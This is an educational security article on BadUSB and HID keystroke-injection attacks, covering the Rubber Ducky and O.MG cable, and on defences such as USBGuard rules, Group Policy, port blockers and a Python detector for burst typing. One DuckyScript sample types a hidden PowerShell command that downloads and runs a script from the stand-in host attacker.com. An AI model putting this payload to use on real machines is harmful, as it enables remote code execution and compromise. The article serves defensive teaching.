A USB drive dropped in a parking lot. A charging cable left at a conference. A “free” flash drive in a swag bag. These are vectors for some of the most underestimated attacks in cybersecurity — BadUSB and HID-based USB attacks. No antivirus catches them. No firewall blocks them. They bypass nearly every perimeter control by impersonating trusted hardware.
What Is BadUSB?
BadUSB is a class of attacks discovered and published by Karsten Nohl and Jakob Lell at Black Hat 2014. The core insight: USB firmware can be reprogrammed. Many USB controllers have writable firmware, and there is no cryptographic signing requirement. An attacker can reflash a USB thumb drive’s controller to make it identify as a keyboard, network adapter, or any other device class — while still appearing as a normal storage drive.
When you plug in a reprogrammed drive, your computer sees a keyboard and automatically trusts it. The device then “types” commands faster than any human could, executing a payload in seconds.
Hak5 Rubber Ducky
The USB Rubber Ducky by Hak5 is the most widely known commercial HID attack tool. It is a purpose-built keystroke injection device that looks exactly like a normal USB flash drive.
How it works:
- Device is recognized as a USB HID keyboard by the target OS
- It executes a DuckyScript payload stored on its microSD card
- Keystrokes execute at machine speed — hundreds per second
DuckyScript basics:
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/p.ps1')"
ENTER
GUI r opens the Windows Run dialog. The payload downloads and executes a remote PowerShell script in a hidden window. Total execution time: under 3 seconds on an unlocked machine.
The Hak5 Bash Bunny takes this further — it can emulate multiple device types simultaneously (keyboard + storage + network adapter) and run more complex multi-stage payloads with Bash scripting.
O.MG Cable
The O.MG Cable (by MG, sold through Hak5) looks and functions as a normal Lightning or USB-C charging cable. Inside the connector housing is a miniature implant containing a Wi-Fi access point, a full attack toolkit, and a keystroke injection engine.
An attacker can:
- Leave it plugged in as a charging cable
- Connect to its Wi-Fi access point from up to 300 feet away
- Remotely trigger payloads, log keystrokes, or exfiltrate data
- Kill the implant to erase evidence
The cable charges devices normally and passes data, so there is no user-visible indicator of compromise. These sell for around $180 and are indistinguishable from genuine cables by appearance.
Real Attack Scenarios
Unattended computer: An attacker with 30 seconds of physical access plugs in a Rubber Ducky. The payload opens PowerShell, downloads a reverse shell, adds a scheduled task for persistence, then closes all windows. The USB is removed before the user returns.
USB drop attack: Drives are left in parking lots, elevators, or common areas with labels like “Salary Data Q1” or “Confidential.” Studies consistently show 45–98% of dropped drives are plugged in by curious employees.
Mailed USB attack: A package arrives claiming to contain a loyalty reward or promotional material. Inside is a USB device. This technique was used in a documented 2021 attack against a US hospitality company (attributed to FIN7), where USB drives were mailed with fake BestBuy and HHS branding.
Conference charging station: A malicious cable at a public charging station compromises any device plugged in. Physical USB charging stations at conferences are a known attack surface.
Defense Strategies
USBGuard on Linux
USBGuard enforces USB device policies through the kernel's USB device authorization interface: a device that matches no allow rule is never bound to a driver. Install it, generate a policy from the devices currently attached, and only then start the daemon (starting it with an empty rule set blocks the devices you are using):
sudo apt install usbguard
sudo sh -c 'usbguard generate-policy > /etc/usbguard/rules.conf'
sudo systemctl enable --now usbguard
This whitelists the devices connected at generation time, matched by vendor/product ID, serial number, port and interface set. Any device plugged in later is blocked until explicitly authorized with usbguard allow-device <id> (add -p to make the authorization permanent).
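The protection USBGuard adds against BadUSB is not the whitelist alone but interface-aware rules: a device that presents both a mass-storage interface and a keyboard interface, or storage plus a network adapter, can be rejected outright regardless of its vendor ID. The following Python is an added example, not code from the article or from the USBGuard project. It is a toy evaluator of USBGuard-style rules (first match wins, wildcard interface patterns, all-of and equals matching) over constructed device descriptors; the vendor/product IDs are made up, and the evaluator is meant to show the policy logic, not to replace usbguard-daemon.

```python
"""
Toy evaluator for USBGuard-style interface rules (added example; not USBGuard code).

A rule has a target (allow / block / reject) and optional conditions:
  vid_pid  - exact "vvvv:pppp" match
  all_of   - every pattern must match at least one interface on the device
  equals   - the device's interface set must match exactly these patterns
Rules are evaluated in order; the first match decides, otherwise the
implicit policy applies (USBGuard's default implicit target is block).
"""
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from typing import List, Optional

# Interface descriptors as class:subclass:protocol (USB-IF class codes)
HID_KEYBOARD = "03:01:01"   # HID, boot subclass, keyboard protocol
MASS_STORAGE = "08:06:50"   # mass storage, SCSI transparent, bulk-only
CDC_ETHERNET = "02:06:00"   # CDC Ethernet networking control model


@dataclass
class Device:
    vid_pid: str
    name: str
    interfaces: List[str]


@dataclass
class Rule:
    target: str
    vid_pid: Optional[str] = None
    all_of: List[str] = field(default_factory=list)
    equals: Optional[List[str]] = None


def rule_matches(rule: Rule, dev: Device) -> bool:
    if rule.vid_pid is not None and rule.vid_pid != dev.vid_pid:
        return False
    for pat in rule.all_of:
        if not any(fnmatchcase(i, pat) for i in dev.interfaces):
            return False
    if rule.equals is not None:
        # every interface must be covered by a pattern, and every pattern used
        covered = all(any(fnmatchcase(i, p) for p in rule.equals) for i in dev.interfaces)
        used = all(any(fnmatchcase(i, p) for i in dev.interfaces) for p in rule.equals)
        if not (covered and used):
            return False
    return True


def evaluate(rules: List[Rule], dev: Device, implicit: str = "block") -> str:
    """Return the target of the first matching rule, or the implicit target."""
    for rule in rules:
        if rule_matches(rule, dev):
            return rule.target
    return implicit


# Constructed policy. Order matters: the reject rules come first so that an
# approved keyboard which suddenly also presents storage is still rejected.
POLICY = [
    Rule("reject", all_of=["08:*:*", HID_KEYBOARD]),            # storage + keyboard composite
    Rule("reject", all_of=["08:*:*", "02:*:*"]),                # storage + network adapter
    Rule("allow", vid_pid="1234:5678", equals=[HID_KEYBOARD]),  # one approved keyboard (constructed ID)
]

# Constructed sample devices
SAMPLES = [
    Device("1234:5678", "Approved keyboard", [HID_KEYBOARD]),
    Device("1234:5678", "Same keyboard, now also storage", [HID_KEYBOARD, MASS_STORAGE]),
    Device("abcd:0001", "Plain thumb drive", [MASS_STORAGE]),
    Device("abcd:0002", "Drive that also claims to be a NIC", [MASS_STORAGE, CDC_ETHERNET]),
    Device("abcd:0003", "Keyboard from an unknown vendor", [HID_KEYBOARD]),
]


def evaluate_samples() -> dict:
    return {d.name: evaluate(POLICY, d) for d in SAMPLES}


if __name__ == "__main__":
    for name, decision in evaluate_samples().items():
        print(f"{decision:6}  {name}")
```

The real rule file equivalent of the first two rules is the `reject with-interface all-of { 08:*:* 03:00:00 }` pattern from the USBGuard documentation; the point of the example is that a composite device is judged on its full interface set, which is exactly what a reflashed drive cannot hide.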
Windows Group Policy
In enterprise environments, disable USB storage via Group Policy:
Computer Configuration → Administrative Templates → System → Removable Storage Access → All Removable Storage Classes: Deny all access
This blocks storage class devices but does not block HID keyboards — a fundamental limitation that Rubber Ducky exploits.
Physical USB Port Blockers
Keyed port blockers (Lindy, Smartkeeper) physically block USB-A ports. Combined with a policy preventing removal, these stop opportunistic physical attacks in server rooms and kiosks.
BIOS/UEFI USB Configuration
Disable USB boot and limit trusted USB devices in BIOS. Some enterprise systems support USB device whitelisting by Vendor ID/Product ID at the firmware level.
Employee Awareness
The simplest control: never plug in a USB device you did not purchase yourself. Train employees to report found USB devices rather than plug them in. A found drive should go to IT, not a workstation.
Detecting HID Attacks
Traditional antivirus is blind to HID attacks — the OS sees a keyboard, not malware. Detection requires:
- EDR with keystroke anomaly detection (high-speed burst typing from a new device is suspicious)
- USB event logging via Windows Event ID 2003 (device install) or udevadm monitor on Linux
- Network monitoring for outbound connections following USB insertion events
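The three signals above only become a detection when they are correlated: a new keyboard appears, it types at a rate no human reaches, and an outbound connection follows within seconds. The Python below is an added example, not code from the article or from any EDR product. It runs that correlation over constructed sample events in a simplified "timestamp|source|message" format (not real udevadm or Windows Event Log output); the thresholds (50 characters per second, 30-second network window) are assumptions a deployment would tune.

```python
"""
Correlate USB keyboard insertion, burst typing and outbound connections.
Added example with constructed sample data; the log format is invented for
the demonstration, not the format of udevadm, Windows events or any EDR.
"""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample events. "key" records are per-second character counts
# attributed to an input device; "net" records are new outbound connections.
SAMPLE_LOG = """\
2024-03-01T09:00:00|usb|add input3 ID_INPUT_KEYBOARD=1 vid=1234 pid=0001 serial=K-OK
2024-03-01T09:00:10|key|input3 chars=12
2024-03-01T09:00:11|key|input3 chars=15
2024-03-01T12:15:00|usb|add input7 ID_INPUT_KEYBOARD=1 vid=abcd pid=0099 serial=NEW
2024-03-01T12:15:02|key|input7 chars=180
2024-03-01T12:15:03|key|input7 chars=220
2024-03-01T12:15:05|net|outbound pid=4312 exe=powershell.exe dst=203.0.113.5:443
2024-03-01T12:15:06|usb|remove input7
"""


def parse(text: str) -> List[Dict]:
    events = []
    for line in text.strip().splitlines():
        ts, src, msg = line.split("|", 2)
        events.append({"ts": datetime.fromisoformat(ts), "src": src, "msg": msg})
    return events


def keyboard_inserts(events: List[Dict]) -> List[Tuple[datetime, str, str]]:
    """Return (time, device, serial) for every newly added keyboard-class device."""
    out = []
    for e in events:
        if e["src"] == "usb" and e["msg"].startswith("add ") and "ID_INPUT_KEYBOARD=1" in e["msg"]:
            parts = e["msg"].split()
            serial = next((p.split("=", 1)[1] for p in parts if p.startswith("serial=")), "?")
            out.append((e["ts"], parts[1], serial))
    return out


def detect(events: List[Dict], burst_cps: int = 50,
           typing_window_s: int = 10, net_window_s: int = 30) -> List[Dict]:
    """Flag keyboards that type at machine speed and/or are followed by outbound traffic."""
    alerts = []
    for ts, dev, serial in keyboard_inserts(events):
        reasons = []
        typing_end = ts + timedelta(seconds=typing_window_s)
        net_end = ts + timedelta(seconds=net_window_s)

        # Peak characters per second from this device right after it appeared.
        # Human typing peaks well under 20 cps; keystroke injection is far higher.
        peak = 0
        for e in events:
            if e["src"] == "key" and e["msg"].startswith(dev + " ") and ts <= e["ts"] <= typing_end:
                peak = max(peak, int(e["msg"].split("chars=")[1]))
        if peak >= burst_cps:
            reasons.append("burst_typing")

        # Any new outbound connection shortly after the keyboard arrived.
        if any(e["src"] == "net" and ts <= e["ts"] <= net_end for e in events):
            reasons.append("outbound_after_insert")

        if reasons:
            alerts.append({"device": dev, "serial": serial, "peak_cps": peak, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(parse(SAMPLE_LOG)):
        print(a)
```

The known keyboard (input3) produces no alert: its peak is 15 characters per second and nothing connects out afterwards. The device that appears at 12:15:00 is flagged on both counts, which is the combination worth paging on; either signal alone (a fast typist, or a browser opening a connection) is too noisy by itself.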
USB-based attacks work precisely because they exploit trust at the hardware level. No amount of software security stops a Rubber Ducky on an unlocked computer. Physical security, port controls, and user training remain the primary defenses.